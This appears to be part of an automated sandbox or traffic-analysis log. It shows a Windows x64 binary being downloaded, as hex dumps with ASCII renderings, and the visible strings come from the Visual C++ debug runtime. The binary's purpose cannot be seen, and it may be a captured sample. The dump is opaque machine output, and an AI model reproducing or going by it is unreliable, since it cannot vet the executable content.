                                                    2022-05-23 07:19:16 UTC82INData Raw: 44 24 40 48 8b 44 24 40 8b 00 ff c0 48 8b 4c 24 40 89 01 83 7c 24 20 ff 0f 84 75 01 00 00 8b 84 24 98 00 00 00 39 44 24 20 0f 8e 64 01 00 00 83 7c 24 20 ff 7e 13 48 8b 84 24 90 00 00 00 8b 40 04 39 44 24 20 7d 02 eb 05 e8 c2 7f ff ff e8 bd 96 ff ff 48 8b 8c 24 0d 0a
                                                    Data Ascii: D$@HD$@HL$@|$ u$9D$ d|$ ~H$@9D$ }H$
                                                    2022-05-23 07:19:16 UTC82INData Raw: 34 35 64 36 0d 0a 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 8b 04 c8 89 44 24 30 e8 9d 96 ff ff 48 8b 8c 24 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 83 7c c8 04 00 74 3a e8 7d 96 ff ff 48 89 44 24 48 e8 73 96 ff ff 48 8b 8c 24 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 48 63 44 c8 04 48 8b 4c 24 48 48 03 c8 48 8b c1 48 89 44 24 50 eb 09 48 c7 44 24 50 00 00 00 00 48 83 7c 24 50 00 0f 84 a7 00 00 00 44 8b 4c 24 30 4c 8b 84 24 90 00 00 00 48 8b 94 24 88 00 00 00 48 8b 8c 24 80 00 00 00 e8 61 eb ff ff e8 0c 96 ff ff 48 8b 8c 24 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 83 7c c8 04 00 74 3a e8 ec 95 ff ff 48 89 44 24 58 e8 e2 95 ff ff 48 8b 8c 24 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 48 63 44 c8 04 48 8b 4c 24 58 48 03 c8 48
                                                    Data Ascii: 45d6HcIHHcL$ D$0H$HcIHHcL$ |t:}HD$HsH$HcIHHcL$ HcDHL$HHHHD$PHD$PH|$PDL$0L$H$H$aH$HcIHHcL$ |t:HD$XH$HcIHHcL$ HcDHL$XHH
                                                    2022-05-23 07:19:16 UTC86INData Raw: 44 24 70 e9 7b 03 00 00 48 8b 44 24 30 48 ff c0 48 89 44 24 30 48 8b 84 24 e0 00 00 00 48 83 c0 02 48 89 84 24 e0 00 00 00 e9 72 ff ff ff 48 8b 44 24 30 48 89 44 24 78 48 8d 4c 24 38 e8 78 07 ff ff 48 8b 44 24 78 e9 37 03 00 00 e9 45 02 00 00 48 8d 4c 24 38 e8 9f 07 ff ff 48 8b 00 8b 8c 24 f0 00 00 00 89 4c 24 28 48 8b 8c 24 e0 00 00 00 48 89 4c 24 20 41 b9 ff ff ff ff 4c 8b 84 24 e8 00 00 00 ba 09 00 00 00 8b 48 04 ff 15 30 c1 00 00 48 98 48 89 44 24 30 48 83 7c 24 30 00 74 27 48 8b 44 24 30 48 ff c8 48 89 84 24 80 00 00 00 48 8d 4c 24 38 e8 ff 06 ff ff 48 8b 84 24 80 00 00 00 e9 bb 02 00 00 ff 15 bc bf 00 00 83 f8 7a 74 3b e8 12 4a ff ff c7 00 2a 00 00 00 33 c0 48 8b 8c 24 e0 00 00 00 66 89 01 48 c7 84 24 88 00 00 00 ff ff ff ff 48 8d 4c 24 38 e8 b9 06
                                                    Data Ascii: D$p{HD$0HHD$0H$HH$rHD$0HD$xHL$8xHD$x7EHL$8H$L$(H$HL$ AL$H0HHD$0H|$0t'HD$0HH$HL$8H$zt;J*3H$fH$HL$8
                                                    2022-05-23 07:19:16 UTC90INData Raw: 00 48 8d 15 b5 0a 01 00 48 8d 0d 2e 0b 01 00 e8 91 4c ff ff b8 16 00 00 00 e9 aa 04 00 00 48 83 bc 24 b0 00 00 00 00 76 0a c7 44 24 68 01 00 00 00 eb 08 c7 44 24 68 00 00 00 00 8b 44 24 68 89 44 24 54 83 7c 24 54 00 75 2e 48 8d 05 44 0a 01 00 48 89 44 24 20 45 33 c9 41 b8 67 00 00 00 48 8d 15 6f 0a 01 00 b9 02 00 00 00 e8 75 42 ff ff 83 f8 01 75 03 cc 33 c0 83 7c 24 54 00 75 3e e8 e1 39 ff ff c7 00 16 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 67 00 00 00 4c 8d 05 35 0a 01 00 48 8d 15 16 0a 01 00 48 8d 0d e7 09 01 00 e8 f2 4b ff ff b8 16 00 00 00 e9 0b 04 00 00 48 8b 84 24 a8 00 00 00 c6 00 00 48 83 bc 24 b0 00 00 00 ff 74 68 48 81 bc 24 b0 00 00 00 ff ff ff 7f 74 5a 48 83 bc 24 b0 00 00 00 01 76 4f 48 8b 84 24 b0 00 00 00 48 ff c8 48 39 05 77 3e 01 00 73
                                                    Data Ascii: HH.LH$vD$hD$hD$hD$T|$Tu.HDHD$ E3AgHouBu3|$Tu>9HD$ AgL5HHKH$H$thH$tZH$vOH$HH9w>s
                                                    2022-05-23 07:19:16 UTC94INData Raw: 24 40 48 83 bc 24 a8 00 00 00 00 0f 84 75 01 00 00 48 8b 84 24 b0 00 00 00 48 39 44 24 40 0f 86 4b 01 00 00 48 83 bc 24 c0 00 00 00 ff 0f 84 27 01 00 00 48 8b 84 24 a8 00 00 00 c6 00 00 48 83 bc 24 b0 00 00 00 ff 74 68 48 81 bc 24 b0 00 00 00 ff ff ff 7f 74 5a 48 83 bc 24 b0 00 00 00 01 76 4f 48 8b 84 24 b0 00 00 00 48 ff c8 48 39 05 7c 2e 01 00 73 0e 48 8b 05 73 2e 01 00 48 89 44 24 78 eb 10 48 8b 84 24 b0 00 00 00 48 ff c8 48 89 44 24 78 48 8b 84 24 a8 00 00 00 48 ff c0 4c 8b 44 24 78 ba fe 00 00 00 48 8b c8 e8 af b0 fe ff 48 8b 44 24 40 48 39 84 24 b0 00 00 00 76 0d c7 84 24 80 00 00 00 01 00 00 00 eb 0b c7 84 24 80 00 00 00 00 00 00 00 8b 84 24 80 00 00 00 89 44 24 50 83 7c 24 50 00 75 2e 48 8d 05 9f fa 00 00 48 89 44 24 20 45 33 c9 41 b8 64 01 00 00
                                                    Data Ascii: $@H$uH$H9D$@KH$'H$H$thH$tZH$vOH$HH9|.sHs.HD$xH$HHD$xH$HLD$xHHD$@H9$v$$$D$P|$Pu.HHD$ E3Ad
                                                    2022-05-23 07:19:16 UTC98INData Raw: 3b e8 55 19 ff ff c7 00 22 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 8e 00 00 00 4c 8d 05 a9 e9 00 00 48 8d 15 ca ec 00 00 48 8d 0d a3 e8 00 00 e8 66 2b ff ff b8 22 00 00 00 eb 6c 33 c0 48 8b 4c 24 30 66 89 01 48 8b 44 24 30 48 83 e8 02 48 89 44 24 30 48 8b 44 24 30 0f b7 00 66 89 44 24 44 48 8b 44 24 30 48 8b 4c 24 48 0f b7 09 66 89 08 48 8b 44 24 48 0f b7 4c 24 44 66 89 08 48 8b 44 24 30 48 83 e8 02 48 89 44 24 30 48 8b 44 24 48 48 83 c0 02 48 89 44 24 48 48 8b 44 24 30 48 39 44 24 48 72 ae 33 c0 48 81 c4 98 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc 44 89 44 24 18 48 89 54 24 10 89 4c 24 08 48 83 ec 58 48 c7 44 24 30 ff ff ff ff 48 63 44 24 60 48 83 f8 fe 75 22 e8 a5 18 ff ff c7 00 00 00 00 00 e8 6a 18 ff ff c7 00 09 00 00 00 48 c7 c0 ff ff ff ff e9
                                                    Data Ascii: ;U"HD$ ALHHf+"l3HL$0fHD$0HHD$0HD$0fD$DHD$0HL$HfHD$HL$DfHD$0HHD$0HD$HHHD$HHD$0H9D$Hr3HDD$HT$L$HXHD$0HcD$`Hu"jH
                                                    2022-05-23 07:19:16 UTC99INData Raw: 33 38 64 31 0d 0a 44 8b 4c 24 70 4c 8d 44 24 34 8b 54 24 30 48 8b 4c 24 38 ff 15 8a 8c 00 00 89 44 24 30 83 7c 24 30 ff 75 23 ff 15 09 8b 00 00 89 44 24 40 83 7c 24 40 00 74 12 8b 4c 24 40 e8 95 14 ff ff 48 c7 c0 ff ff ff ff eb 59 8b 44 24 60 c1 f8 05 48 98 48 8d 0d 6c 4f 01 00 8b 54 24 60 83 e2 1f 48 63 d2 48 6b d2 58 48 8b 04 c1 0f be 44 10 08 83 e0 fd 8b 4c 24 60 c1 f9 05 48 63 c9 48 8d 15 41 4f 01 00 44 8b 44 24 60 41 83 e0 1f 4d 63 c0 4d 6b c0 58 48 8b 0c ca 42 88 44 01 08 48 8b 44 24 30 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 44 24 18 48 89 54 24 10 89 4c 24 08 48 83 ec 58 48 63 44 24 60 48 83 f8 fe 75 20 e8 ee 14 ff ff c7 00 00 00 00 00 e8 b3 14 ff ff c7 00 09 00 00 00 b8 ff ff ff ff e9 2f 02 00 00 83 7c 24 60 00 7c 16 8b 05
                                                    Data Ascii: 38d1DL$pLD$4T$0HL$8D$0|$0u#D$@|$@tL$@HYD$`HHlOT$`HcHkXHDL$`HcHAODD$`AMcMkXHBDHD$0HXDD$HT$L$HXHcD$`Hu /|$`|
                                                    2022-05-23 07:19:16 UTC104INData Raw: 2f 00 00 48 8b 84 24 98 3d 00 00 48 8b 8c 24 a0 2f 00 00 48 2b c8 48 8b c1 3b 84 24 a0 3d 00 00 0f 83 66 02 00 00 c7 84 24 10 3d 00 00 00 00 00 00 48 8d 84 24 e0 28 00 00 48 89 84 24 90 2f 00 00 48 8d 84 24 e0 28 00 00 48 8b 8c 24 90 2f 00 00 48 2b c8 48 8b c1 48 3d a8 06 00 00 0f 83 a7 00 00 00 48 8b 84 24 98 3d 00 00 48 8b 8c 24 a0 2f 00 00 48 2b c8 48 8b c1 3b 84 24 a0 3d 00 00 0f 83 84 00 00 00 48 8b 84 24 a0 2f 00 00 0f b7 00 66 89 84 24 98 2f 00 00 48 8b 84 24 a0 2f 00 00 48 83 c0 02 48 89 84 24 a0 2f 00 00 0f b7 84 24 98 2f 00 00 83 f8 0a 75 24 b8 0d 00 00 00 48 8b 8c 24 90 2f 00 00 66 89 01 48 8b 84 24 90 2f 00 00 48 83 c0 02 48 89 84 24 90 2f 00 00 48 8b 84 24 90 2f 00 00 0f b7 8c 24 98 2f 00 00 66 89 08 48 8b 84 24 90 2f 00 00 48 83 c0 02 48 89
                                                    Data Ascii: /H$=H$/H+H;$=f$=H$(H$/H$(H$/H+HH=H$=H$/H+H;$=H$/f$/H$/HH$/$/u$H$/fH$/HH$/H$/$/fH$/HH
                                                    2022-05-23 07:19:16 UTC108INData Raw: eb bc 00 00 e8 c6 06 ff ff c7 84 24 70 03 00 00 ff ff ff ff 48 8d 4c 24 78 e8 41 b1 fe ff 8b 84 24 70 03 00 00 e9 b5 16 00 00 48 8b 84 24 40 04 00 00 48 89 84 24 d0 02 00 00 48 8b 84 24 d0 02 00 00 8b 40 18 83 e0 40 85 c0 0f 85 01 01 00 00 48 8b 8c 24 d0 02 00 00 e8 b2 f8 ff ff 89 84 24 d8 02 00 00 83 bc 24 d8 02 00 00 ff 74 3f 83 bc 24 d8 02 00 00 fe 74 35 8b 84 24 d8 02 00 00 c1 f8 05 48 98 48 8d 0d 34 2e 01 00 8b 94 24 d8 02 00 00 83 e2 1f 48 63 d2 48 6b d2 58 48 03 14 c1 48 8b c2 48 89 84 24 a0 03 00 00 eb 0f 48 8d 05 fb f8 00 00 48 89 84 24 a0 03 00 00 48 8b 84 24 a0 03 00 00 0f b6 40 38 d0 e0 d0 f8 0f be c0 85 c0 75 71 83 bc 24 d8 02 00 00 ff 74 3f 83 bc 24 d8 02 00 00 fe 74 35 8b 84 24 d8 02 00 00 c1 f8 05 48 98 48 8d 0d c5 2d 01 00 8b 94 24 d8 02
                                                    Data Ascii: $pHL$xA$pH$@H$H$@@H$$$t?$t5$HH4.$HcHkXHHH$HH$H$@8uq$t?$t5$HH-$
                                                    2022-05-23 07:19:16 UTC112INData Raw: 24 48 10 00 00 00 8b 44 24 50 25 80 00 00 00 85 c0 74 1b c6 44 24 54 30 8b 84 24 c4 02 00 00 83 c0 51 88 44 24 55 c7 44 24 5c 02 00 00 00 eb 21 c7 44 24 48 08 00 00 00 8b 44 24 50 25 80 00 00 00 85 c0 74 0c 8b 44 24 50 0f ba e8 09 89 44 24 50 8b 44 24 50 25 00 80 00 00 85 c0 74 1a 48 8d 8c 24 58 04 00 00 e8 0f 57 ff ff 48 89 84 24 38 03 00 00 e9 ad 00 00 00 8b 44 24 50 25 00 10 00 00 85 c0 74 1a 48 8d 8c 24 58 04 00 00 e8 e8 56 ff ff 48 89 84 24 38 03 00 00 e9 86 00 00 00 8b 44 24 50 83 e0 20 85 c0 74 40 8b 44 24 50 83 e0 40 85 c0 74 1b 48 8d 8c 24 58 04 00 00 e8 58 56 ff ff 48 0f bf c0 48 89 84 24 38 03 00 00 eb 18 48 8d 8c 24 58 04 00 00 e8 3d 56 ff ff 0f b7 c0 48 89 84 24 38 03 00 00 eb 3b 8b 44 24 50 83 e0 40 85 c0 74 19 48 8d 8c 24 58 04 00 00 e8 18
                                                    Data Ascii: $HD$P%tD$T0$QD$UD$\!D$HD$P%tD$PD$PD$P%tH$XWH$8D$P%tH$XVH$8D$P t@D$P@tH$XXVHH$8H$X=VH$8;D$P@tH$X
                                                    2022-05-23 07:19:16 UTC114INData Raw: 31 65 36 33 0d 0a 8c 00 00 00 48 8b 44 24 48 8b 40 08 ff c8 89 44 24 20 48 8b 44 24 48 8b 4c 24 20 89 48 08 83 7c 24 20 00 7c 32 48 8b 44 24 48 48 8b 00 0f b6 4c 24 40 88 08 0f be 44 24 40 25 ff 00 00 00 89 44 24 24 48 8b 44 24 48 48 8b 00 48 ff c0 48 8b 4c 24 48 48 89 01 eb 15 0f be 44 24 40 48 8b 54 24 48 8b c8 e8 fa 4b ff ff 89 44 24 24 83 7c 24 24 ff 75 0d 48 8b 44 24 50 c7 00 ff ff ff ff eb 10 48 8b 44 24 50 8b 00 ff c0 48 8b 4c 24 50 89 01 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 4c 89 44 24 18 89 54 24 10 88 4c 24 08 48 83 ec 28 8b 44 24 38 8b 4c 24 38 ff c9 89 4c 24 38 85 c0 7e 22 4c 8b 44 24 48 48 8b 54 24 40 0f b6 4c 24 30 e8 e4 fe ff ff 48 8b 44 24 48 83 38 ff 75 02 eb 02 eb cc 48 83 c4 28 c3 cc 4c 89 4c 24 20 4c 89
                                                    Data Ascii: 1e63HD$H@D$ HD$HL$ H|$ |2HD$HHL$@D$@%D$$HD$HHHHL$HHD$@HT$HKD$$|$$uHD$PHD$PHL$PH8LL$ LD$T$L$H(D$8L$8L$8~"LD$HHT$@L$0HD$H8uH(LL$ L
                                                    2022-05-23 07:19:16 UTC118INData Raw: 8b 44 24 50 0f ba f0 0f 89 44 24 50 eb 72 48 8b 84 24 08 06 00 00 0f b7 00 83 f8 64 74 50 48 8b 84 24 08 06 00 00 0f b7 00 83 f8 69 74 40 48 8b 84 24 08 06 00 00 0f b7 00 83 f8 6f 74 30 48 8b 84 24 08 06 00 00 0f b7 00 83 f8 75 74 20 48 8b 84 24 08 06 00 00 0f b7 00 83 f8 78 74 10 48 8b 84 24 08 06 00 00 0f b7 00 83 f8 58 75 02 eb 10 c7 84 24 c0 04 00 00 00 00 00 00 e9 d4 fc ff ff eb 19 8b 44 24 50 83 c8 20 89 44 24 50 eb 0c 8b 44 24 50 0f ba e8 0b 89 44 24 50 e9 0f 0d 00 00 0f b7 84 24 b8 04 00 00 89 84 24 84 05 00 00 8b 84 24 84 05 00 00 83 e8 41 89 84 24 84 05 00 00 83 bc 24 84 05 00 00 37 0f 87 6f 0a 00 00 48 63 84 24 84 05 00 00 48 8d 0d 36 20 fe ff 0f b6 84 01 04 ee 01 00 8b 84 81 c8 ed 01 00 48 03 c1 ff e0 8b 44 24 50 25 30 08 00 00 85 c0 75 0b 8b
                                                    Data Ascii: D$PD$PrH$dtPH$it@H$ot0H$ut H$xtH$Xu$D$P D$PD$PD$P$$$A$$7oHc$H6 HD$P%0u
                                                    2022-05-23 07:19:16 UTC121INData Raw: 31 61 64 36 0d 0a 05 00 00 89 84 24 40 05 00 00 83 bc 24 40 05 00 00 00 75 2e 48 8d 05 84 97 00 00 48 89 44 24 20 45 33 c9 41 b8 f5 08 00 00 48 8d 15 1f 86 00 00 b9 02 00 00 00 e8 a5 c6 fe ff 83 f8 01 75 03 cc 33 c0 83 bc 24 40 05 00 00 00 75 52 e8 0e be fe ff c7 00 16 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 f5 08 00 00 4c 8d 05 e2 85 00 00 48 8d 15 4b 99 00 00 48 8d 0d 24 97 00 00 e8 1f d0 fe ff c7 84 24 60 05 00 00 ff ff ff ff 48 8d 4c 24 78 e8 9a 7a fe ff 8b 84 24 60 05 00 00 eb 1f 8b 84 24 b0 04 00 00 89 84 24 64 05 00 00 48 8d 4c 24 78 e8 79 7a fe ff 8b 84 24 64 05 00 00 48 8b 8c 24 e8 05 00 00 48 33 cc e8 e2 44 fe ff 48 81 c4 f8 05 00 00 c3 66 90 41 dc 01 00 6b dc 01 00 a8 dc 01 00 30 dd 01 00 88 dd 01 00 95 dd 01 00 e0 dd 01 00 8d df 01 00 24 e4
                                                    Data Ascii: 1ad6$@$@u.HHD$ E3AHu3$@uRHD$ ALHKH$$`HL$xz$`$$dHL$xyz$dH$H3DHfAk0$
                                                    2022-05-23 07:19:16 UTC125INData Raw: 00 00 00 00 e9 38 ff ff ff b9 01 00 00 00 e8 fd 95 fe ff 8b 44 24 20 48 83 c4 38 c3 cc cc cc cc 48 89 4c 24 08 48 83 ec 38 48 83 7c 24 40 00 75 09 33 c9 e8 78 01 00 00 eb 55 48 8b 4c 24 40 e8 5c 00 00 00 85 c0 74 07 b8 ff ff ff ff eb 40 48 8b 44 24 40 8b 40 18 25 00 40 00 00 85 c0 74 2d 48 8b 4c 24 40 e8 f6 b1 ff ff 8b c8 e8 ff 09 00 00 85 c0 74 0a c7 44 24 20 ff ff ff ff eb 08 c7 44 24 20 00 00 00 00 8b 44 24 20 eb 02 33 c0 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 38 c7 44 24 20 00 00 00 00 48 8b 44 24 40 48 89 44 24 28 48 8b 44 24 28 8b 40 18 83 e0 03 83 f8 02 0f 85 9a 00 00 00 48 8b 44 24 28 8b 40 18 25 08 01 00 00 85 c0 0f 84 85 00 00 00 48 8b 44 24 28 48 8b 4c 24 28 48 8b 49 10 48 8b 00 48 2b c1 89 44 24 24 83 7c 24
                                                    Data Ascii: 8D$ H8HL$H8H|$@u3xUHL$@\t@HD$@@%@t-HL$@tD$ D$ D$ 3H8HL$H8D$ HD$@HD$(HD$(@HD$(@%HD$(HL$(HIHH+D$$|$
                                                    2022-05-23 07:19:16 UTC128INData Raw: 32 30 38 38 0d 0a 00 00 00 00 48 8b 44 24 30 c7 40 18 00 00 00 00 8b 44 24 38 48 83 c4 58 c3 89 4c 24 08 48 83 ec 58 48 63 44 24 60 48 83 f8 fe 75 15 e8 58 a3 fe ff c7 00 09 00 00 00 b8 ff ff ff ff e9 33 02 00 00 83 7c 24 60 00 7c 16 8b 05 4f dd 00 00 39 44 24 60 73 0a c7 44 24 3c 01 00 00 00 eb 08 c7 44 24 3c 00 00 00 00 8b 44 24 3c 89 44 24 34 83 7c 24 34 00 75 2e 48 8d 05 ad 82 00 00 48 89 44 24 20 45 33 c9 41 b8 2c 00 00 00 48 8d 15 28 82 00 00 b9 02 00 00 00 e8 6e ab fe ff 83 f8 01 75 03 cc 33 c0 83 7c 24 34 00 75 3e e8 da a2 fe ff c7 00 09 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 2c 00 00 00 4c 8d 05 ee 81 00 00 48 8d 15 cf 81 00 00 48 8d 0d 50 82 00 00 e8 eb b4 fe ff b8 ff ff ff ff e9 8c 01 00 00 8b 44 24 60 c1 f8 05 48 98 48 8d 0d c1 dc 00 00 8b
                                                    Data Ascii: 2088HD$0@D$8HXL$HXHcD$`HuX3|$`|O9D$`sD$<D$<D$<D$4|$4u.HHD$ E3A,H(nu3|$4u>HD$ A,LHHPD$`HH
                                                    2022-05-23 07:19:16 UTC132INData Raw: 73 65 6c 66 5f 36 34 5f 61 6d 64 36 34 5c 63 72 74 5c 73 72 63 5c 74 69 64 74 61 62 6c 65 2e 63 00 00 43 6c 69 65 6e 74 00 00 49 67 6e 6f 72 65 00 00 43 52 54 00 4e 6f 72 6d 61 6c 00 00 46 72 65 65 00 00 00 00 00 00 00 00 64 24 02 80 01 00 00 00 5c 24 02 80 01 00 00 00 58 24 02 80 01 00 00 00 50 24 02 80 01 00 00 00 48 24 02 80 01 00 00 00 45 72 72 6f 72 3a 20 6d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 69 6f 6e 3a 20 62 61 64 20 6d 65 6d 6f 72 79 20 62 6c 6f 63 6b 20 74 79 70 65 2e 0a 00 00 00 00 00 00 00 49 6e 76 61 6c 69 64 20 61 6c 6c 6f 63 61 74 69 6f 6e 20 73 69 7a 65 3a 20 25 49 75 20 62 79 74 65 73 2e 0a 00 00 00 00 25 73 00 00 00 00 00 00 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 61 6c 6c 6f 63 61 74 69 6f 6e 20 66 61 69 6c 75 72 65 2e 0a 00 00 00 00 00
                                                    Data Ascii: self_64_amd64\crt\src\tidtable.cClientIgnoreCRTNormalFreed$\$X$P$H$Error: memory allocation: bad memory block type.Invalid allocation size: %Iu bytes.%sClient hook allocation failure.
                                                    2022-05-23 07:19:16 UTC136INData Raw: 31 32 32 39 0d 0a 00 64 00 6c 00 6c 00 00 00 66 3a 5c 64 64 5c 76 63 74 6f 6f 6c 73 5c 63 72 74 5f 62 6c 64 5c 73 65 6c 66 5f 36 34 5f 61 6d 64 36 34 5c 63 72 74 5c 73 72 63 5c 69 6f 69 6e 69 74 2e 63 00 00 00 00 73 00 74 00 72 00 63 00 70 00 79 00 5f 00 73 00 28 00 2a 00 65 00 6e 00 76 00 2c 00 20 00 63 00 63 00 68 00 61 00 72 00 73 00 2c 00 20 00 70 00 29 00 00 00 00 00 00 00 5f 00 73 00 65 00 74 00 65 00 6e 00 76 00 70 00 00 00 00 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 73 00 74 00 64 00 65 00 6e 00 76 00 70 00 2e 00
                                                    Data Ascii: 1229dllf:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.cstrcpy_s(*env, cchars, p)_setenvpf:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.
                                                    2022-05-23 07:19:16 UTC140INData Raw: 69 00 6c 00 75 00 72 00 65 00 2c 00 20 00 73 00 65 00 65 00 20 00 74 00 68 00 65 00 20 00 56 00 69 00 73 00 75 00 61 00 6c 00 20 00 43 00 2b 00 2b 00 20 00 64 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 61 00 74 00 69 00 6f 00 6e 00 20 00 6f 00 6e 00 20 00 61 00 73 00 73 00 65 00 72 00 74 00 73 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 77 00 63 00 73 00 63 00 70 00 79 00 5f 00 73 00 28 00 73 00 7a 00 45 00 78 00 65 00 4e 00 61 00 6d 00 65 00 2c 00 20 00 32 00 36 00 30 00 2c 00 20 00 4c 00 22 00 3c 00 70 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 6e 00 61 00 6d 00 65 00 20 00 75 00 6e 00 6b 00 6e 00 6f 00 77 00 6e 00 3e 00 22 00 29 00 00 00 5f 00 5f 00 63 00 72 00 74 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 57 00 69 00 6e 00 64 00 6f 00 77 00 57
                                                    Data Ascii: ilure, see the Visual C++ documentation on asserts.wcscpy_s(szExeName, 260, L"<program name unknown>")__crtMessageWindowW
                                                    2022-05-23 07:19:16 UTC141INData Raw: 37 66 65 61 0d 0a 65 00 78 00 70 00 61 00 6e 00 64 00 2e 00 63 00 00 00 00 00 00 00 00 00 70 00 42 00 6c 00 6f 00 63 00 6b 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 00 00 28 00 66 00 6f 00 72 00 6d 00 61 00 74 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 69 00 73 00 63 00 74 00 79 00 70 00 65 00 2e 00 63 00 00 00 00 00 00 00 28 00 75 00 6e 00 73 00 69 00 67 00 6e 00 65 00 64 00 29 00 28 00 63 00 20 00 2b 00 20 00 31 00 29
                                                    Data Ascii: 7feaexpand.cpBlock != NULL(format != NULL)f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c(unsigned)(c + 1)
                                                    2022-05-23 07:19:16 UTC145INData Raw: 00 28 00 28 00 28 00 5f 00 53 00 72 00 63 00 29 00 29 00 29 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 00 00 73 00 74 00 72 00 63 00 70 00 79 00 5f 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 74 00 63 00 73 00 63 00 70 00 79 00 5f 00 73 00 2e 00 69 00 6e 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 00 28 00 5f 00 44 00 73 00 74 00 29 00 29 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 20 00 26 00 26 00 20 00 28 00 28 00 5f 00 53 00 69 00 7a 00 65 00
                                                    Data Ascii: (((_Src))) != NULLstrcpy_sf:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl((_Dst)) != NULL && ((_Size
                                                    2022-05-23 07:19:16 UTC149INData Raw: 34 00 30 00 39 00 36 00 2c 00 20 00 31 00 30 00 29 00 00 00 5f 00 56 00 43 00 72 00 74 00 44 00 62 00 67 00 52 00 65 00 70 00 6f 00 72 00 74 00 41 00 00 00 77 00 63 00 73 00 74 00 6f 00 6d 00 62 00 73 00 5f 00 73 00 28 00 26 00 72 00 65 00 74 00 2c 00 20 00 73 00 7a 00 61 00 4f 00 75 00 74 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20 00 73 00 7a 00 4f 00 75 00 74 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 28 00 28 00 73 00 69 00 7a 00 65 00 5f 00 74 00 29 00 2d 00 31 00 29 00 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 73 00 74 00 72 00 63 00 70 00 79 00 5f 00 73 00 28 00 73 00 7a 00 4f 00 75 00 74 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 32 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20
                                                    Data Ascii: 4096, 10)_VCrtDbgReportAwcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))strcpy_s(szOutMessage2, 4096,
                                                    2022-05-23 07:19:16 UTC153INData Raw: 00 72 00 63 00 5c 00 74 00 63 00 73 00 63 00 61 00 74 00 5f 00 73 00 2e 00 69 00 6e 00 6c 00 00 00 00 00 00 00 00 00 77 00 63 00 73 00 6e 00 63 00 70 00 79 00 5f 00 73 00 00 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 74 00 63 00 73 00 6e 00 63 00 70 00 79 00 5f 00 73 00 2e 00 69 00 6e 00 6c 00 00 00 00 00 00 00 b0 5a 01 80 01 00 00 00 62 61 64 20 65 78 63 65 70 74 69 6f 6e 00 00 00 90 95 02 80 01 00 00 00 e0 48 01 80 01 00 00 00 20 d6 01 80 01 00 00 00 5f 00 6d 00 62 00 73 00 74 00 6f 00 77 00 63 00 73 00 5f 00 6c 00 5f 00
                                                    Data Ascii: rc\tcscat_s.inlwcsncpy_sf:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inlZbad exceptionH _mbstowcs_l_
